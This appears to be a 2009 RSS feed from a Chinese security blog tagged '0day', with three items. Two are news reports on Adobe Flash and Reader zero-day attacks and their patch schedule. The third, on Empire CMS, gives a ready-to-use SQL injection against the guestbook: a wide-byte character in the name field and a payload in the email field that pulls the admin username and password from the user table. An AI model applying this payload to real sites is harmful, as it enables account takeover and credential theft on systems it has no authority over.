<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>四维映像 &#187; 0day</title>
	<atom:link href="http://www.i4wei.com/tag/0day/feed/" rel="self" type="application/rss+xml" />
	<link>http://www.i4wei.com</link>
	<description>The more a man learns, the more he sees his ignorance.</description>
	<lastBuildDate>Tue, 31 Aug 2010 18:51:03 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.0.1</generator>
		<item>
		<title>Almost all Windows users vulnerable to Flash 0-day attacks</title>
		<link>http://www.i4wei.com/2009/07/1023/</link>
		<comments>http://www.i4wei.com/2009/07/1023/#comments</comments>
		<pubDate>Wed, 29 Jul 2009 14:38:09 +0000</pubDate>
		<dc:creator>i4wei</dc:creator>
				<category><![CDATA[信息安全]]></category>
		<category><![CDATA[0day]]></category>
		<category><![CDATA[Security]]></category>

		<guid isPermaLink="false">http://www.i4wei.com/?p=1023</guid>
		<description><![CDATA[国外著名安全建议机构secunia今日称发现一个Flash相关0-day攻击，几乎所有的Windows用户都将受到安全威胁。Secunia 称爆出的0-day攻击Flash版本号跨度相当大——从9.0.159.0一直到10.0.22.87，Adobe公司将于周四发布补丁修补此漏洞。 同样安装了Adobe Reader和Abode Acrobat的用户也受到此次0-day攻击的威胁，因两款软件都在PDF文件里内建了Flash内容支持。Adobe公司目前已经获知了该漏洞，称将于7月30日发布针对Flash Player的补丁，于7月31日发布针对Adobe Reader和acrobat的补丁。 Like Unlike 相关文章阅读New attacks exploit Vulnerability in Adobe Flash帝国CMS网站程序0DAYIntel收购McAfee 安全成为各大豪门未来战场FBI逮捕斯洛维尼亚籍黑客WPA2协议爆漏洞：或从内部遭受攻击]]></description>
		<wfw:commentRss>http://www.i4wei.com/2009/07/1023/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>New attacks exploit Vulnerability in Adobe Flash</title>
		<link>http://www.i4wei.com/2009/07/998/</link>
		<comments>http://www.i4wei.com/2009/07/998/#comments</comments>
		<pubDate>Thu, 23 Jul 2009 13:22:18 +0000</pubDate>
		<dc:creator>i4wei</dc:creator>
				<category><![CDATA[信息安全]]></category>
		<category><![CDATA[0day]]></category>
		<category><![CDATA[Security]]></category>

		<guid isPermaLink="false">http://www.i4wei.com/?p=998</guid>
		<description><![CDATA[安全专家最近警告称黑客正在利用新版 Adobe Flash Player 的漏洞向用户发起攻击，这种漏洞可以让黑客获得对用户电脑的完全控制权。黑客同样也可以利用伪装的PDF文件来对此漏洞进行攻击，不过更常用的方法是伪造一个1.1KB的Flash视频文件进行攻击。尽管目前为止，利用这种漏洞进行攻击的数量还不多，但预计这种攻击方法很快就会被普遍采用。更糟糕的是，目前为止大多数杀毒引擎都不能识别出感染了这种病毒的SWF文件。 按Adobe官网上的说明，这个漏洞去年12月份就曾被发现过，不过当时报告这个漏洞的用户称漏洞只是造成程序崩溃。 根据对PDF染毒文件的分析显示，病毒代码是在7月9日编译完成的，这意味着这款病毒很可能已经在网上流传了几周之久。 周三Adobe的安全团队称他们正在对一个影响PDF阅读器和Flash程序的漏洞进行分析调查，不过他们并没有透露详细信息，也没有说明何时会有补丁推出。 据VirusTotal提供的数据，截稿前排名靠前的41款防毒软件都无法识别这种病毒，而只有7家防毒软件公司可以识别感染了这种病毒的PDF文件，赛门铁克则称他们的软件可以将其识别为Trojan.Pidief.G病毒。 使用安装了NoScript类插件的火狐浏览器可以免受这种病毒的侵扰，不过这种方法并非万无一失，如果你信任的站点被病毒侵入，那么黑客一样也可以得逞。 Like Unlike 相关文章阅读Almost all Windows users vulnerable to Flash 0-day attacks帝国CMS网站程序0DAYIntel收购McAfee 安全成为各大豪门未来战场FBI逮捕斯洛维尼亚籍黑客WPA2协议爆漏洞：或从内部遭受攻击]]></description>
		<wfw:commentRss>http://www.i4wei.com/2009/07/998/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>帝国CMS网站程序0DAY</title>
		<link>http://www.i4wei.com/2009/06/849/</link>
		<comments>http://www.i4wei.com/2009/06/849/#comments</comments>
		<pubDate>Fri, 26 Jun 2009 14:45:45 +0000</pubDate>
		<dc:creator>i4wei</dc:creator>
				<category><![CDATA[实用技巧]]></category>
		<category><![CDATA[0day]]></category>
		<category><![CDATA[Security]]></category>

		<guid isPermaLink="false">http://www.i4wei.com/?p=849</guid>
		<description><![CDATA[找到使用帝国CMS的站,网址后面直接加： e/tool/gbook/?bid=1 出来的是帝国CMS的留言本,在姓名处写： 縗\ 联系邮箱处写： ,1,1,1,(select concat(username,0x5f,password,0x5f,rnd) from phome_enewsuser where userid=1),1,1,1,0,0,0)/* 提交后爆出账号密码 via：amxking Like Unlike 相关文章阅读Almost all Windows users vulnerable to Flash 0-day attacksNew attacks exploit Vulnerability in Adobe FlashIntel收购McAfee 安全成为各大豪门未来战场FBI逮捕斯洛维尼亚籍黑客WPA2协议爆漏洞：或从内部遭受攻击]]></description>
		<wfw:commentRss>http://www.i4wei.com/2009/06/849/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>
